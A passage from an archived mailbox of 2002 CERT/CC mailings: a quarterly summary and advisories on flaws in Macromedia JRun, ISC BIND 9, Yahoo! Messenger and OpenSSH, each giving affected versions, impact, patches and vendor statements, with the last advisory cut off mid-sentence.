List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Summary CS-2002-02 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 295 Status: RO X-Status: X-Keywords: X-UID: 49 -----BEGIN PGP SIGNED MESSAGE----- CERT Summary CS-2002-02 May 28, 2002 Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems. Past CERT summaries are available at http://www.cert.org/summaries/. ______________________________________________________________________ Recent Activity Since the last regularly scheduled CERT summary, issued in February 2002 (CS-2002-01), we have released several advisories addressing vulnerabilties in Microsoft's IIS server, Oracle Database and Application Servers, Sun Solaris cachefsd, and MSN Instant Messenger. In addition, we have published statistics for the first quarter of 2002, numerous white papers, and a collection of frequently asked questions about the OCTAVE Method. For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change. 1. Exploitation of Vulnerabilities in Microsoft SQL Server The CERT/CC has received reports of systems being compromised through the automated exploitation of null or weak default sa passwords in Microsoft SQL Server and Microsoft Data Engine. This activity is accompanied by high volumes of scanning, and appears to be related to recently discovered self-propagating malicious code, referred to by various sources as Spida, SQLsnake, and Digispid. CERT Incident Note IN-2002-04: Exploitation of Vulnerabilities in Microsoft SQL Server http://www.cert.org/incident_notes/IN-2002-04.html 2. Buffer Overflow in Microsoft's MSN Chat ActiveX Control Microsoft's MSN Chat is an ActiveX control for Microsoft Messenger, an instant messaging client. A buffer overflow exists in the ActiveX control that may permit a remote attacker to execute arbitrary code on the system with the privileges of the current user. CERT Advisory CA-2002-13: Buffer Overflow in Microsoft's MSN Chat ActiveX Control http://www.cert.org/advisories/CA-2002-13.html 3. Format String Vulnerability in ISC DHCPD The Internet Software Consortium (ISC) provides a Dynamic Host Configuration Protocol Daemon (DHCPD), which is a server that is used to allocate network addresses and assign configuration parameters to hosts. A format string vulnerability may permit a remote attacker to execute code with the privileges of the DHCPD (typically root). We have not seen active scanning or exploitation of this vulnerability. CERT Advisory CA-2002-12: Format String Vulnerability in ISC DHCPD http://www.cert.org/advisories/CA-2002-12.html 4. Heap Overflow in Cachefs Daemon (cachefsd) Sun's NFS/RPC file system cachefs daemon (cachefsd) is shipped and installed by default with Sun Solaris 2.5.1, 2.6, 7, and 8 (SPARC and Intel architectures). A remotely exploitable vulnerability exists in cachefsd that could permit a remote attacker to execute arbitrary code with the privileges of the cachefsd, typically root. The CERT/CC has received credible reports of scanning and exploitation of Solaris systems running cachefsd. CERT Advisory CA-2002-11: Heap Overflow in Cachefs Daemon (cachefsd) http://www.cert.org/advisories/CA-2002-11.html 5. Multiple Vulnerabilities in Microsoft IIS A variety of vulnerabilities exist in various versions of Microsoft IIS. Some of these vulnerabilities may allow an intruder to execute arbitrary code on vulnerable systems. CERT Advisory CA-2002-09: Multiple Vulnerabilities in Microsoft IIS http://www.cert.org/advisories/CA-2002-09.html 6. Multiple Vulnerabilities in Oracle Servers Multiple vulnerabilities in Oracle Application Server and Oracle Database have recently been discovered. These vulnerabilities include buffer overflows, insecure default settings, failures to enforce access controls, and failure to validate input. The impacts of these vulnerabilities include the execution of arbitrary commands or code, denial of service, and unauthorized access to sensitive information. CERT Advisory CA-2002-08: Multiple Vulnerabilities in Oracle Servers http://www.cert.org/advisories/CA-2002-08.html 7. Social Engineering Attacks via IRC and Instant Messaging The CERT/CC has received reports of social engineering attacks on users of Internet Relay Chat (IRC) and Instant Messaging (IM) services. Intruders trick unsuspecting users into downloading and executing malicious software, which allows the intruders to use the systems as attack platforms for launching distributed denial-of-service (DDoS) attacks. The reports to the CERT/CC indicate that tens of thousands of systems have recently been compromised in this manner. CERT Incident Note IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging http://www.cert.org/incident_notes/IN-2002-03.html ______________________________________________________________________ What's New and Updated Since the last CERT Summary, we have published new or updated * Advisories * Incident Notes * CERT/CC Statistics * OCTAVE^SM Method Frequently Asked Questions * White Papers + Foundations for Survivable Systems Engineering + Organized Crime and Cyber-Crime: Implications for Business + Overview of Attack Trends + Using PGP to Verify Digital Signatures + Downstream Liability for Attack Relay Amplification + Cross-Site Scripting Vulnerabilities + Countering Cyber War ______________________________________________________________________ This document is available from: http://www.cert.org/summaries/CS-2002-02.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright ©2002 Carnegie Mellon University. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPPPOk6CVPMXQI2HJAQHHeAQAxlNggZhs00dAQBX4Wvm1xIeBMyK6NYLn HQyiHIhHFoeshf+FsF1aBbwV1m07nkv9OnEWm4I2fqOPtPRNQJAAhud7XrfEpeOm EqEkHQD9LaoQux/HVe23Gmp/Lv5RkLbUu72tL18KdI7YVnteRKvtxIWvCgFfvjRM 2YTPonaOjlQ= =XKwE -----END PGP SIGNATURE----- From - Wed May 29 18:18:19 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g4U1GhdD006828; Wed, 29 May 2002 18:16:43 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id SAA29922; Wed, 29 May 2002 18:35:12 -0400 (EDT) Date: Wed, 29 May 2002 18:35:12 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 29 May 2002 18:29:28 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-14 Buffer overflow in Macromedia JRun X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 300 Status: RO X-Status: X-Keywords: X-UID: 50 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-14 Buffer overflow in Macromedia JRun Original release date: May 29, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Windows NT4 or Windows 2000 running IIS versions 4 or 5 and Macromedia JRun 3.0 or 3.1 Overview A remotely exploitable buffer overflow exists in Macromedia's JRun 3.0 and 3.1. I. Description JRun is an application server that works with most popular web servers, such as Apache and Internet Information Server (IIS). According to Macromedia, JRun is deployed at over 10,000 organizations worldwide. As reported in the Next Generation Security Software Advisory (#NISR29052002), a remotely exploitable buffer overflow exists in the ISAPI filter/application. Specifically, the buffer overflow exists in the portion of code that handles the host header field. If an attacker sends a specially crafted request to the application server, he can overwrite a return address on the stack. Because the vulnerable DLL is running in the address space of the web server process, code submitted by the attacker will be run with SYSTEM privileges. II. Impact A remote attacker can execute arbitrary code on the vulnerable target with SYSTEM privileges. III. Solution Apply a patch from Macromedia or upgrade to JRun 4. The patch is available from: http://www.macromedia.com/v1/Handlers/index.cfm?ID=22273&Method=Full#download JRun 4 is available at: http://www.macromedia.com/software/jrun/ Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. Additional information can be found in VU#703835. Macromedia Inc. Macromedia has confirmed that this is a problem in older versions of JRun 3.0 and 3.1 and is soon to publish a security bulletin regarding this. Visit the Macromedia security zone site at http://www.macromedia.com/security for more information. _________________________________________________________________ This vulnerability was discovered by David Litchfield of Next Generation Security Software. _________________________________________________________________ Author: Ian A. Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-14.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History May 29, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPPVQSqCVPMXQI2HJAQGVHgP/U5zIg4973uYvBmeM4X06vfkHbRFG7YM8 nwnnqneHG/xPkytz3LpjfbbBtmdXWJmfJK64J/R9vGu84Cbp3NR2MvDPQ6J3c+7+ v6/uaemXWZZdbpxtLTULWqCsy+Fkp6XpOekvImEek1A9jKxVnH2lB42OwW28pmap RYbu1k04txk= =RYRj -----END PGP SIGNATURE----- From - Tue Jun 4 14:48:27 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g54LfpTu012928; Tue, 4 Jun 2002 14:41:52 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id QAA24905; Tue, 4 Jun 2002 16:44:55 -0400 (EDT) Date: Tue, 4 Jun 2002 16:44:55 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 4 Jun 2002 16:39:22 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-15 Denial-of-Service Vulnerability in ISC BIND 9 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 322 Status: RO X-Status: X-Keywords: X-UID: 51 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-15 Denial-of-Service Vulnerability in ISC BIND 9 Original release date: June 04, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Domain Name System (DNS) servers running ISC BIND 9 prior to 9.2.1 Because the normal operation of most services on the Internet depends on the proper operation of DNS servers, other services could be affected if this vulnerability is exploited. Overview A denial-of-service vulnerability exists in version 9 of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. ISC BIND versions 8 and 4 are not affected. Exploiting this vulnerability will cause the BIND server to shut down. I. Description BIND is an implementation of the Domain Name System (DNS) that is maintained by the ISC. A vulnerability exists in version 9 of BIND that allows remote attackers to shut down BIND servers. An attacker can cause the shutdown by sending a specific DNS packet designed to trigger an internal consistency check. However, this vulnerability will not allow an attacker to execute arbitrary code or write data to arbitrary locations in memory. The internal consistency check that triggers the shutdown occurs when the rdataset parameter to the dns_message_findtype() function in message.c is not NULL as expected. The condition causes the code to assert an error message and call abort() to shut down the BIND server. It is also possible to accidentally trigger this vulnerability using common queries found in routine operation, especially queries originating from SMTP servers. A vulnerability note describing this problem can be found at http://www.kb.cert.org/vuls/id/739123. This vulnerability note includes a list of vendors that have been contacted about this vulnerability. This vulnerability is also being referenced as CAN-2002-0400: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0400 II. Impact Exploitation of this vulnerability will cause the BIND server to abort and shut down. As a result, the BIND server will not be available unless it is restarted. III. Solution Apply a patch from your vendor The ISC has released BIND version 9.2.1. The CERT/CC recommends that users of BIND 9 apply a patch from their vendor or upgrade to BIND 9.2.1. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple The version of BIND that ships in Mac OS X and Mac OS X Server does not contain this vulnerability. BSDI Wind River Systems, Inc. does not include BIND 9 with any version of BSD/OS. Caldera SCO OpenServer from Caldera does not ship BIND9, and is therefore not vulnerable. Caldera Open UNIX does ship BIND9, and is vulnerable. We are investigating. Caldera OpenLinux does not ship BIND9, and is therefore not vulnerable. Compaq Computer Corporation HP Alpha Server Products: HP Tru64 UNIX: Tru64 UNIX is not vulnerable to this reported problem. HP Tru64 UNIX ships with BIND 8.2.2-p5 TCP/IP for HP OpenVms: TCP/IP for HP OpenVms is not vulnerable to this reported problem.The current versions of TCP/IP for HP OpenVMS ship BIND 8.2.2-p5 HP NonStop Server: "HP NonStop Himalaya is not vulnerable to this problem. The 'named' function of Domain Name Server (T6021) which is implemented for HP NonStop Himalaya is based on BIND 4.8. NonStop DNS is the only Himalaya software product that includes 'named'." Cray Cray, Inc. is not vulnerable since the BIND distributed with Unicos and Unicos/mk is not based on BIND 9. Engarde Guardian Digital does not ship BIND 9 in any versions of EnGarde Secure Linux, therefore we are not vulnerable. All versions were shipped with BIND 8. F5 Networks, Inc. F5 Networks' products do not include BIND 9, and are therefore not affected by this vulnerability. FreeBSD The FreeBSD base system does not ship with ISC BIND 9. However, ISC BIND 9 is available in the FreeBSD Ports Collection. It is currently at version 9.2.1 and is therefore unaffected. Hewlett-Packard Company HP is Vulnerable, Solution investigation continuing.. IBM After analysis of the affected component, IBM has determined that the AIX bind deamon is not vulnerable to the attack as described in the CERT advisory. Internet Software Consortium This vulnerability was found through routine bug analysis. BIND 9 is designed to exit when it detects an internal consistency error to reduce the impact of bugs in the server. ISC strongly reccomends that all BIND 9 users upgrade immediately to 9.2.1. BIND 9.2.1 can be found at http://www.isc.org/products/BIND/bind9.html. MandrakeSoft Mandrake Linux 8.x ships with BIND9 and as such updated packages will be available as early as possible. Microsoft Corporation Microsoft has reviewed the information and can confirm that our products are not affected by this vulnerability. NEC Corporation sent on June 3, 2002 [Server Products] * EWS/UP 48 Series operating system - is NOT vulnerable. NetBSD NetBSD has not included Bind 9 in the base system of any release or -current development branch. Bind 9 is available from the 3rd party software system, pkgsrc. Users who have installed net/bind9 or net/bind9-current should update to a fixed version. pkgsrc/security/audit-packages can be used to keep up to date with these types of issues. Network Appliance All NetApp products do not contain any BIND code, so no NetApp product is vulnerable to this problem. Nortel Networks Limited Nortel Networks is reviewing its portfolio to determine if any products are affected by the vulnerability noted in CERT Advisory CA-2002-15. A definitive statement will be issued shortly. Red Hat Red Hat distributed BIND 9 in Red Hat Linux versions 7.1, 7.2, and 7.3. We are currently working on producing errata packages, when complete these will be available along with our advisory at the URL below. At the same time users of the Red Hat Network will be able to update their systems using the 'up2date' tool. http://rhn.redhat.com/errata/RHSA-2002-105.html Silicon Graphics, Inc. IRIX does not ship with BIND9 and is not vulnerable. Sun Microsystems Sun does not ship BIND 9 with any version of Solaris at this time and is therefore not affected by this issue. SuSE, Inc. We are affected by the bind9 DoS issue as well. All of our currently supported SuSE Linux products come with a bind9 package. We will release an announcement for the issue, coordinated with your timeframe and not before we see your official announcement. Unisphere Networks, Inc. The Unisphere Networks ERX family of edge routers does not implement a DNS server or named daemon within the Unison OS. Additionally, the DNS client found on the ERX is not based on the ISC BIND code. Unisphere Networks has no reason to expect a similar problem exists in the DNS client implementation found on the ERX. _________________________________________________________________ The CERT Coordination Center thanks the Internet Software Consortium for notifying us about this vulnerability. _________________________________________________________________ Author: Ian A. Finlay ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-15.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 04, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPP0kn6CVPMXQI2HJAQFEyQP/fkgF01EWoE2JPDB3kPwLhSUSrM8XHNvQ +vfuH8ZSUAiG0/g/zSGjeTt0NFYeeI6kMS7MQqS76ECaP93l7gR/zucShEkOKliy 4NHjoF34gPqPlDu6BAdh2xfl9q+LNdu8EHs8rjl1FqjvPKmL436tS0ToJXqXDpmx /WHO3P3AwhM= =M/6l -----END PGP SIGNATURE----- From - Wed Jun 5 13:46:00 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g55KDS9b006804; Wed, 5 Jun 2002 13:13:28 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id PAA00365; Wed, 5 Jun 2002 15:07:33 -0400 (EDT) Date: Wed, 5 Jun 2002 15:07:33 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 5 Jun 2002 15:01:44 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 323 Status: RO X-Status: X-Keywords: X-UID: 52 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-16 Multiple Vulnerabilities in Yahoo! Messenger Original release date: June 05, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Yahoo! Messenger version 5,0,0,1064 and prior for Microsoft Windows Overview There are multiple vulnerabilities in Yahoo! Messenger. Attackers that are able to exploit these vulnerabilities may be able to execute arbitrary code with the privileges of the victim user. We have not seen active scanning for these vulnerabilities, nor have we received any reports of these vulnerabilities being exploited, but users should upgrade to version 5,0,0,1065 or later. I. Description Yahoo! Messenger is a widely used program for communicating with other users over the Internet. On May 27, 2002, a buffer overflow and a URL validation vulnerability were discovered in the Yahoo! Messenger client for Microsoft Windows. Details of each vulnerability follow: VU#137115 - Yahoo! Messenger contains a buffer overflow in the URI handler The buffer overflow occurs during the processing of the Yahoo! Messenger URI handler (ymsgr:). This URI handler is installed at the system level for applications that use the underlying operating system when processesing URIs (such as Microsoft Internet Explorer, Netscape Navigator 6, Microsoft Outlook, or the command shell). A URI can be sent by another Yahoo! Messenger user in a message, embedded in a web site, or sent in an HTML-renderable email message. This vulnerability has been assigned as CAN-2002-0031 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0031 VU#172315 - Yahoo! Messenger "addview" function allows for the automatic execution of malicious script contained in web pages A vulnerability exists in the Yahoo! Messenger "addview" function that permits a remote attacker to execute arbitrary script and HTML in the Internet security zone of the local machine. The "addview" function is only supposed to accept view information from Yahoo! servers. However, an attacker can send malicious script and HTML to the client using the Yahoo! URL redirection service. This script or HTML is interpreted by the Yahoo! Messenger client and is displayed in the client's web browser. This vulnerability has been assigned as CAN-2002-0032 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0032 These vulnerabilities were resolved in Yahoo! Messenger version 5,0,0,1065, released May 22, 2002; however, a bug in the distribution server may have inadvertantly installed Yahoo! Messenger version 5,0,0,1036 on systems that downloaded Yahoo! Messenger after May 22, 2002. The bug in the distribution server has since been resolved. In February 2002, the following vulnerabilities were reported to affect Yahoo! Messenger: * http://www.kb.cert.org/vuls/id/393195 * http://www.kb.cert.org/vuls/id/419419 * http://www.kb.cert.org/vuls/id/755755 * http://www.kb.cert.org/vuls/id/887319 * http://www.kb.cert.org/vuls/id/952875 All of these vulnerabilities were resolved in Yahoo! Messenger version 5,0,0,1058, released February 25, 2002, or by server-side resolutions around the same time. II. Impact A remote attacker can execute arbitrary code with the privileges of the victim user, cause a denial of service, or modify data in the victim's buddy list. III. Solution Upgrade to the latest version of Yahoo! Messenger On May 22, 2002, Yahoo! released a fixed version of Yahoo! Messenger (5,0,0,1065) and began issuing a patch (5,0,0,1066) via the AutoUpdater to address this issue. All users should upgrade to version 5,0,0,1065 or later. Users with versions prior to 5,0,0,1066 that have "Auto Update" enabled will receive a message informing them that an upgrade is available. All users should accept this upgrade. Users who downloaded Yahoo! Messenger after May 22, 2002, should be aware that a bug in the distribution server may have inadvertantly installed Yahoo! Messenger version 5,0,0,1036, which is vulnerable to all issues in this advisory. The bug in the distribution server has since been resolved. Users should upgrade and verify the version of Yahoo! Messenger by selecting the "About Yahoo! Messenger..." option from the Help menu. Implement a firewall and filtering Yahoo! Messenger listens for peer-to-peer requests on port 5101/TCP but users can implement a firewall to block inbound and outbound access to port 5101/TCP. However, since Yahoo! Messenger URI's can be embedded in a web site or email message, blocking requests to and from port 5101/TCP is not a completely effective solution. Mail and Internet filters should also be applied to filter the "ymsgr:" URI handler from email messages and web sites. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Yahoo!, Inc. Yahoo! encourages users to upgrade to the latest version whenever prompted by the AutoUpdater or regularly check for updated versions of the client at http://messenger.yahoo.com. _________________________________________________________________ The CERT Coordination Center thanks Scott Woodward , Phuong Nguyen , and Adam Lang for their discovery and analysis of these vulnerabilities. We also thank Yahoo! for their assistance in analyzing and responding to these issues. _________________________________________________________________ Feedback can be directed to the author: Jason A. Rafail _________________________________________________________________ Appendix B. - References 1. http://www.kb.cert.org/vuls/id/137115 2. http://www.kb.cert.org/vuls/id/172315 3. http://www.kb.cert.org/vuls/id/393195 4. http://www.kb.cert.org/vuls/id/419419 5. http://www.kb.cert.org/vuls/id/755755 6. http://www.kb.cert.org/vuls/id/887319 7. http://www.kb.cert.org/vuls/id/952875 ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-16.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History June 05, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPP5cYaCVPMXQI2HJAQGAUAQAh/Xuz419nzyhbV8Oif1WDa2qczCF8ETW hYzkQYsi7tXg+kR4GcHfWgFDwlB4F4ojVoe7uBdKfasmQ7lfWXx2V+xxSm7LIbou 6YItFjt8CXPnC6WS+4ODjfr8U+hFRw2AIoUTcewwFT1PMHEMjtunQaiEJkXLqGkM YAhQ31TZF6Y= =jGbu -----END PGP SIGNATURE----- From - Wed Jun 26 18:30:58 2002 Return-Path: Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g5R1Ll57020690; Wed, 26 Jun 2002 18:21:47 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.12) with SMTP id TAA26650; Wed, 26 Jun 2002 19:08:43 -0400 (EDT) Date: Wed, 26 Jun 2002 19:08:43 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 26 Jun 2002 19:02:58 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 369 Status: RO X-Status: X-Keywords: X-UID: 53 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Handling Original release date: June 26, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * OpenSSH versions 2.3.1p1 through 3.3 Overview There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and that use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting. Additionally, a number of other possible security problems have been corrected in OpenSSH version 3.4. I. Description Two related vulnerabilities have been found in the handling of challenge responses in OpenSSH. The first vulnerability is an integer overflow in the handling of the number of responses received during challenge response authentication. If the challenge response configuration option is set to yes and the system is using SKEY or BSD_AUTH authentication then a remote intruder may be able to exploit the vulnerability to execute arbitrary code. This vulnerability is present in versions of OpenSSH 2.9.9 through 3.3. An exploit for this vulnerability is reported to exist. This vulnerability is partially described in a recent ISS security advisory available at http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 The second vulnerability is a buffer overflow involving the number of responses received during challenge response authentication. Regardless of the setting of the challenge response configuration option, systems using PAM modules that use interactive keyboard authentication (PAMAuthenticationViaKbdInt), may be vulnerable to the remote execution of code. At this time, it is not known if this vulnerability is exploitable. Both vulnerabilities are corrected by the patches in a recent OpenSSH security advisory available from http://www.openssh.com/txt/preauth.adv Both vulnerabilities exploit features present only in version 2 of the SSH protocol. Vulnerability Note VU#369347 lists the vendors we contacted about this vulnerability. The vulnerability note is available from http://www.kb.cert.org/vuls/id/369347 II. Impact A remote attacker can execute code with the privileges of the user running the sshd (often root). These vulnerabilities may also be used to cause a denial-of-service condition. III. Solution Upgrade to OpenSSH version 3.4 These vulnerabilities are eliminated by upgrading to OpenSSH version 3.4, which is available from the OpenSSH web site at http://www.openssh.com OpenSSH version 3.4 will correct several other software defects with potential security implications not described in this advisory. Apply a patch from your vendor A patch for this problem is included in the OpenSSH advisory at http://www.openssh.com/txt/preauth.adv This patch may be manually installed with minor changes to correct these vulnerabilities in all affected versions of OpenSSH. Please note that applying the patches described in the OpenSSH advisory does not correct the other software defects with potential security implications not described in this advisory. If your vendor has provided a patch to correct these vulnerabilities, you may want to apply their patch rather than upgrading your version of sshd. System administrators may want to confirm whether their vendor's patch includes the other possible 